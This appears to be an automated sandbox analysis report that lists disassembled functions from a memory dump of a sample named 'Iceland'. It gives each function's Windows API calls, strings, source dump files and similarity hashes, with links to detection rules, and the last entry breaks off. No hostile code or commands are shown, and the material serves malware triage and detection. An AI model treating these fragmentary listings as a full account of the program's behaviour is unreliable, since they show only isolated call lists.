API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 3ec829464946d8e0fba8314492facd025d15edc77247ee7735f6e7aa7874db48
Instruction ID: 47bee62f2d1acf949a4a506b5a9fd52972f8d1ac5eab8b7e6987fc32002b6725
Opcode Fuzzy Hash: 3ec829464946d8e0fba8314492facd025d15edc77247ee7735f6e7aa7874db48
Instruction Fuzzy Hash: E561BC712083019FCB11DF68C989F6EBBE8BF89714F00090AF9959B291CB34ED45CB92

Function 00988BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00988C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00988CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00988CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00988D55
SetCurrentDirectoryW.KERNEL32(?), ref: 00988D69
SetCurrentDirectoryW.KERNEL32(?), ref: 00988D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00988DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 00988DDA

Strings

*.*, xrefs: 00988DE0

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: d93e0753e2f66cb3d2c7d80f62ad1890fce43e059960abbebea4ad92cf44b7ef
Instruction ID: 2233b40612ad55e4e6643ea5c1896591e19c87c37efc404e36529409bfe385f2
Opcode Fuzzy Hash: d93e0753e2f66cb3d2c7d80f62ad1890fce43e059960abbebea4ad92cf44b7ef
Instruction Fuzzy Hash: 93615BB25043099FCB10EF60C845A9FB3E8FF99310F44481EF99997291DB35E945CBA2

Function 009A46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 009A4715
SetMenu.USER32(?,00000000), ref: 009A4724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009A47AC
IsMenu.USER32(?), ref: 009A47C0
CreatePopupMenu.USER32 ref: 009A47CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009A47F7
DrawMenuBar.USER32 ref: 009A47FF

Strings

F, xrefs: 009A47EA
0, xrefs: 009A46F0

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: a4519ea377ad7c3f4adade541105adc8ec40b851b0ba6f043bcc2e42c192c89d
Instruction ID: 8f5ee1bad909f3e9ffb886f9acb98a1033a9e0710132aa0654869267c87f4d94
Opcode Fuzzy Hash: a4519ea377ad7c3f4adade541105adc8ec40b851b0ba6f043bcc2e42c192c89d
Instruction Fuzzy Hash: C5418B75A11249EFDB14CF68E884EAA7BB9FF8A314F144028FA4697350D7B4AD10DF90

Function 0097282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

Part of subcall function 009745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00974620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 009728B1
GetDlgCtrlID.USER32 ref: 009728BC
GetParent.USER32 ref: 009728D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 009728DB
GetDlgCtrlID.USER32(?), ref: 009728E4
GetParent.USER32(?), ref: 009728F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 009728FB

Strings

ComboBox, xrefs: 00972839
ListBox, xrefs: 0097286E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 1fa763a5872a62c9f746dc325b624ef2d582a06a15e9f4994187dc44a013d163
Instruction ID: 75098560b5d8fd1cd0dcc6d2aadb89c32bc734195f060effb43ef87976915238
Opcode Fuzzy Hash: 1fa763a5872a62c9f746dc325b624ef2d582a06a15e9f4994187dc44a013d163
Instruction Fuzzy Hash: DA21F9B5E00118BFCF14AFA0CC85EEEBB79EF46350F004156B966932D1DB394959DB60

Function 0097290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

Part of subcall function 009745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00974620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00972990
GetDlgCtrlID.USER32 ref: 0097299B
GetParent.USER32 ref: 009729B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 009729BA
GetDlgCtrlID.USER32(?), ref: 009729C3
GetParent.USER32(?), ref: 009729D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 009729DA

Strings

ComboBox, xrefs: 0097291A
ListBox, xrefs: 0097294F

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: a4e83ff4288ea30666b7e026664ecec2ad44563cc108e9c57da88f554e695ff5
Instruction ID: 3067fef1f8172c725b6d9be58f203aa5cf2a9ec7f92a5463b65edfe136c545f5
Opcode Fuzzy Hash: a4e83ff4288ea30666b7e026664ecec2ad44563cc108e9c57da88f554e695ff5
Instruction Fuzzy Hash: CA2108B6E01118BBCF04AFA0CC45FFEBBB9EF05340F108056B95597291C7394949DB60

Function 009A44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 009A4539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 009A453C
GetWindowLongW.USER32(?,000000F0), ref: 009A4563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 009A4586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 009A45FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 009A4648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 009A4663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 009A467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 009A4692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 009A46AF

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 86009d884c4e569bd310354181f575e656252b9b9aee6c5b03b57aa4f54116c0
Instruction ID: 215057444df41fd12073c343db03c974a5c5e122cded367fe9abf5bf27e87991
Opcode Fuzzy Hash: 86009d884c4e569bd310354181f575e656252b9b9aee6c5b03b57aa4f54116c0
Instruction Fuzzy Hash: 8B618F75A40248AFDB10DFA4CD81EEE77B8EF4A710F100159FA14EB2A1C7B4AD46DB90

Function 0097BAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0097BB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0097ABA8,?,00000001), ref: 0097BB2C
GetWindowThreadProcessId.USER32(00000000), ref: 0097BB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0097ABA8,?,00000001), ref: 0097BB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 0097BB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0097ABA8,?,00000001), ref: 0097BB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0097ABA8,?,00000001), ref: 0097BB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0097ABA8,?,00000001), ref: 0097BBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0097ABA8,?,00000001), ref: 0097BBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0097ABA8,?,00000001), ref: 0097BBE4

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: bdbc5f4cc530a6592897c77b14875a998707554e10fa5dfdaa4fb93e8658fbc9
Instruction ID: 0d0169f3b61d628f6a5ad5c5ced99ef5b6a7fc81409b47564ef7bd975ab9d59e
Opcode Fuzzy Hash: bdbc5f4cc530a6592897c77b14875a998707554e10fa5dfdaa4fb93e8658fbc9
Instruction Fuzzy Hash: B431C172928204AFDB109F15DCC4F6937ADEF49312F108025FE0ACB1A0D7749D409B64

Function 00942FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00943007

Part of subcall function 00942D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0094DB51,009E1DC4,00000000,009E1DC4,00000000,?,0094DB78,009E1DC4,00000007,009E1DC4,?,0094DF75,009E1DC4), ref: 00942D4E
Part of subcall function 00942D38: GetLastError.KERNEL32(009E1DC4,?,0094DB51,009E1DC4,00000000,009E1DC4,00000000,?,0094DB78,009E1DC4,00000007,009E1DC4,?,0094DF75,009E1DC4,009E1DC4), ref: 00942D60

_free.LIBCMT ref: 00943013
_free.LIBCMT ref: 0094301E
_free.LIBCMT ref: 00943029
_free.LIBCMT ref: 00943034
_free.LIBCMT ref: 0094303F
_free.LIBCMT ref: 0094304A
_free.LIBCMT ref: 00943055
_free.LIBCMT ref: 00943060
_free.LIBCMT ref: 0094306E

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 39effa1889ae3653657002ba2c5da1e1a330bfae5b07dff912f4cfbe7ef90e32
Instruction ID: 9a66df35326ec185913fee896ebd5f7ed9b686706b9d09abc024e2fc37b8199f
Opcode Fuzzy Hash: 39effa1889ae3653657002ba2c5da1e1a330bfae5b07dff912f4cfbe7ef90e32
Instruction Fuzzy Hash: 02115676910108FFCB01EF94C942EDD3BA5FF45350BE145A5FA089F262DA32EE519B90

Function 00912AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00912AF9
OleUninitialize.OLE32(?,00000000), ref: 00912B98
UnregisterHotKey.USER32(?), ref: 00912D7D
DestroyWindow.USER32(?), ref: 00953A1B
FreeLibrary.KERNEL32(?), ref: 00953A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00953AAD

Strings

close all, xrefs: 00912AF4

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 4c280a11a102ea37f76703789a804814c72979f4567031bd38a323504795f8a8
Instruction ID: 61adfdbe5afef730117357b5c1393c053fd23190c38b0fdf4dd94e45601f8194
Opcode Fuzzy Hash: 4c280a11a102ea37f76703789a804814c72979f4567031bd38a323504795f8a8
Instruction Fuzzy Hash: D2D1AD71705212CFCB29EF15D895BA9F7A4BF84741F1182ADE84A6B251CB30ED66CF80

Function 00988835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009889F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00988A06
GetFileAttributesW.KERNEL32(?), ref: 00988A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 00988A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 00988A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 00988AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00988AF5

Strings

*.*, xrefs: 00988AAB

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: ccd5b65fafd7bb6bfeb07b9b8019c11e78e4e4d103925604d4ea7a918cb8cd7c
Instruction ID: d7aeb8c5b258aef8aff4c40556834b994f0d5ee810eee4700b1177cd88dda1b1
Opcode Fuzzy Hash: ccd5b65fafd7bb6bfeb07b9b8019c11e78e4e4d103925604d4ea7a918cb8cd7c
Instruction Fuzzy Hash: B9816D729042459BCB24FF54C844ABBB3E8BF85310F944C1EF899D7351DB39E9458BA2

Function 00917447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 009174D7

Part of subcall function 00917567: GetClientRect.USER32(?,?), ref: 0091758D
Part of subcall function 00917567: GetWindowRect.USER32(?,?), ref: 009175CE
Part of subcall function 00917567: ScreenToClient.USER32(?,?), ref: 009175F6

GetDC.USER32 ref: 00956083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00956096
SelectObject.GDI32(00000000,00000000), ref: 009560A4
SelectObject.GDI32(00000000,00000000), ref: 009560B9
ReleaseDC.USER32(?,00000000), ref: 009560C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00956152

Strings

U, xrefs: 00956021

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 086c968a2c70bd1cd2b6cb3183dc7760c47ad3e5d1f6e12796f862168f0b5458
Instruction ID: 9cd3aa7c0a5ff4aa79d138c6ad5ba1e3945b505c183c7d25ea0dfce534aa88ae
Opcode Fuzzy Hash: 086c968a2c70bd1cd2b6cb3183dc7760c47ad3e5d1f6e12796f862168f0b5458
Instruction Fuzzy Hash: A271D131508209DFCF25CF65CC84AFA7BBAFF49322F144669ED555B1A2C7348884DB50

Function 009A955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0091249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009124B0

Part of subcall function 009119CD: GetCursorPos.USER32(?), ref: 009119E1
Part of subcall function 009119CD: ScreenToClient.USER32(00000000,?), ref: 009119FE
Part of subcall function 009119CD: GetAsyncKeyState.USER32(00000001), ref: 00911A23
Part of subcall function 009119CD: GetAsyncKeyState.USER32(00000002), ref: 00911A3D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 009A95C7
ImageList_EndDrag.COMCTL32 ref: 009A95CD
ReleaseCapture.USER32 ref: 009A95D3
SetWindowTextW.USER32(?,00000000), ref: 009A966E
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 009A9681
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 009A975B

Strings

@GUI_DROPID, xrefs: 009A96AD
@GUI_DRAGFILE, xrefs: 009A96F6

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 3a2a15d73b7798789265a5c20d346112a9bb4ac99189384bb267c47b05376fb0
Instruction ID: 8712cb27b52333b320ac7525c8ce6686a911fc27ecd6e11c5e2f667007c7133a
Opcode Fuzzy Hash: 3a2a15d73b7798789265a5c20d346112a9bb4ac99189384bb267c47b05376fb0
Instruction Fuzzy Hash: 27518D70218344AFD704EF24CC96FAA77E9FB85714F400919F9969B2E2CB709D44DB92

Function 0098CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0098CCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0098CCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0098CD0F
GetLastError.KERNEL32 ref: 0098CD67
SetEvent.KERNEL32(?), ref: 0098CD7B
InternetCloseHandle.WININET(00000000), ref: 0098CD86

Strings

, xrefs: 0098CD00

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 4bcfd3eca207ad4cc347885a0f41c26df328a4d9a71af9bedc648e755bc4a28e
Instruction ID: 436c84bd61af4daa3994ef5cacfaa1cbe369d8763d839f7fb5988db982b3e1a0
Opcode Fuzzy Hash: 4bcfd3eca207ad4cc347885a0f41c26df328a4d9a71af9bedc648e755bc4a28e
Instruction Fuzzy Hash: F2319CF1505208AFD721BF648C88AAB7BFCEF85740B10492EF44692380DB34ED04ABB0

Function 0097A215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009555AE,?,?,Bad directive syntax error,009ADCD0,00000000,00000010,?,?), ref: 0097A236
LoadStringW.USER32(00000000,?,009555AE,?), ref: 0097A23D

Part of subcall function 0091B329: _wcslen.LIBCMT ref: 0091B333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0097A301

Strings

., xrefs: 0097A2E7
%s (%d) : ==> %s.: %s %s, xrefs: 0097A26B
Line %d (File "%s"):, xrefs: 0097A2A7
Line %d:, xrefs: 0097A28C
Error: , xrefs: 0097A2CF

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 3fd3a3e16683b9f537a8b17f76e38f2d97a39513b626b59d99b2a66e8fa38e80
Instruction ID: b77716d251131c4848fa024cf3a04e22ef0071d9c92b0e2a035a72461bbc3226
Opcode Fuzzy Hash: 3fd3a3e16683b9f537a8b17f76e38f2d97a39513b626b59d99b2a66e8fa38e80
Instruction Fuzzy Hash: 4F21913294421EEFCF02AFA0CC06FEE7B39BF58304F008465F51A660A2EB719658DB51

Function 009729EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 009729F8
GetClassNameW.USER32(00000000,?,00000100), ref: 00972A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00972A9A

Strings

list, xrefs: 00972A7C
SHELLDLL_DefView, xrefs: 00972A19
largeicons, xrefs: 00972A2E
details, xrefs: 00972A48
smallicons, xrefs: 00972A62

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009D3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330608058.00000000009DD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_910000_Iceland.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 833ca9aca415b044ba604dbc8cb57673c5ad5e45c91b8469535666f296a2830b
Instruction ID: 527d72958ed50118389c55fbffdaa67904b91da01e694d2385c02f1b38954f6a
Opcode Fuzzy Hash: 833ca9aca415b044ba604dbc8cb57673c5ad5e45c91b8469535666f296a2830b
Instruction Fuzzy Hash: 1911E97729C307B9FE286720EC07EAA379DDF55728F218023F509E50D1FB69B8415954

Function 00917567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0091758D
GetWindowRect.USER32(?,?), ref: 009175CE
ScreenToClient.USER32(?,?), ref: 009175F6
GetClientRect.USER32(?,?), ref: 0091773A
GetWindowRect.USER32(?,?), ref: 0091775B

Memory Dump Source

Source File: 00000015.00000002.3329927223.0000000000911000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00910000, based on PE: true

Associated: 00000015.00000002.3329752079.0000000000910000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.3330340686.00000000009AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
